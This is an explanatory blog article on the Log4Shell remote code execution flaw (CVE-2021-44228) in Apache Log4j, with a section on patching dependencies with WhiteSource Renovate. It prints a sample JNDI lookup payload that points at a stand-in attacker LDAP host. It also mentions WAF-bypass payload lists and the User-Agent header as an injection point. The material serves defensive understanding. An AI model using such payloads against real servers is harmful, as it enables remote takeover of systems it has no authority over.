# **Tackling the New Apache Log4j Vulnerability**  <center> [Photo](https://unsplash.com/photos/zvHhKiVuR9M) by [Arget](https://unsplash.com/@arget?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on Unsplash </center> In this article, I will talk about the recently popular security vulnerability Log4j RCE (CVE-2021--44228) and how you can protect yourself using WhiteSource Renovate. To understand Log4j RCE, we first need to briefly understand what the Apache Log4j library is. So, let's get started. ## **What Is Apache Log4j?** Apache Log4j is a Java-based logging framework that provides logging of errors while hunting bugs in the development process of any software. Log4j is one of the preferred logging services for Java because it is both popular and easy to use. So, many of the big companies, such as Apple, Steam, Tesla, and Minecraft, use this product. ## **What Is Log4Shell?** <center> [Source](https://dev.to/nabbisen/apache-log4j-rce-vulnerability-cve-2021-44228-attack-trials-detected-h8c)</center> First, let's back up a little bit. The main reason why the Log4j framework has been so popular lately is that on December 9, 2021, a remote code execution vulnerability was found in the Log4j framework and named "Log4Shell" by the Alibaba Cloud security team. [Log4Shell](https://en.wikipedia.org/wiki/Log4Shell) basically allows attackers to execute code on the target vulnerable server remotely. This could potentially be called a takeover of the entire system. Now, many big companies using this product are vulnerable to this exploitation. The vulnerability was detected in Apple, Steam, and Minecraft, and it attracted a lot of attention. If we try to understand the vulnerability technically, CVE-2021--44228 is summarized by the National Vulnerability Database ([NVD](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)) as follows. "Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints."  If a hacker controls the log messages or log message parameters, they can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior was disabled by default, and from version 2.16.0, this function was completely removed. What makes CVE-2021--44228 particularly dangerous (10.0 Critical) is how easy it is to exploit. An attacker only needs to send a string to an endpoint with the vulnerable version of log4j. ## CVE-2021--44228: Log4Shell Analysis Let's take a look at the payload the attacker will use to understand the exploitation phase more easily. *A simple Log4Shell payload pattern looks like this: ${jndi:ldap://attacker.com/a* In addition, payload models can be diversified to bypass WAFs or firewalls. If you want to review more payloads, you can look at[ some GitHub repositories](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words).  As can be seen in the above image, the payload basically consists of three units: **I) Java Naming and Directory Interface (JNDI):** It is an API (application programming interface) service that enables Java applications to find data and resources and communicate with services such as LDAP. The JNDI service also has another service known as SPI (service provider interface), which allows it to create and use various directory services. **II) Lightweight Directory Access Protocol (LDAP):** It is a type of communication protocol used to query any application running on TCP/IP and access directory information services. Java-based applications can use JNDI+LDAP services together to query and access data. So, LDAP can be preferred for information access from any server running on the remote machine. **III) Any server controlled by the attacker:** A server created by the attacker to use when communicating with the vulnerable server. (In some test scenarios, DNS logging services can be used to determine whether the target server is vulnerable.) <center>Example vulnerable code by [Lunasec](https://www.lunasec.io/docs/blog/log4j-zero-day/)</center> After this stage, all the attacker will do is paste the malicious payload code to any input point to be logged and try to communicate with the server. There may be too many vulnerable entry points. One of them is User-Agent, which is one of the HTTP protocols. User-Agent is another way attackers often find success as User-Agent is the HTTP header where all contact information between the end user and web application is shared. This header contains user-specific details such as the user's operating system, browser application, and the versions. ## Tackling Log4Shell Using WhiteSource Renovate [WhiteSource Renovate](https://www.whitesourcesoftware.com/free-developer-tools/renovate/) is a free developer tool developed by WhiteSource. This tool was created to fix out-of-date dependencies in software projects. As every developer knows, a software project starts with all its dependencies being up to date, but loses this feature over time. Renovate can detect outdated dependencies in projects while also checking for the availability of new versions. In addition, it can create commits and merge/pull requests to show release notes. You can implant the application in your GitHub repository via the GitHub App or access the[ installation details](https://docs.renovatebot.com/getting-started/installing-onboarding/) as open source. If you have a GitHub repository, you can easily [implant](https://github.com/apps/renovate) the application into your repository. Now that I have given you a basic explanation of the WhiteSource Renovate tool, I can explain how you can protect yourself from the Log4Shell vulnerability by using this tool.  Having implemented the Renovate tool in our GitHub repository, let's examine the GitHub[ repository](https://github.com/whitesource/log4j-remediations) for Log4Shell. This repository contains hundreds of files preset by WhiteSource to be fixed to non-Log4Shell versions. To use this preset, add it to your Renovate. Your Renovate.json config file will look like this:  For more details, you can check their Git repo for [Log4j remediations](https://github.com/whitesource/log4j-remediations) as well. ## Conclusion I hope this article about the Log4Shell vulnerability and some of the precautions that can be taken was helpful. That's all for now. Thanks for reading! Join me later for another write up!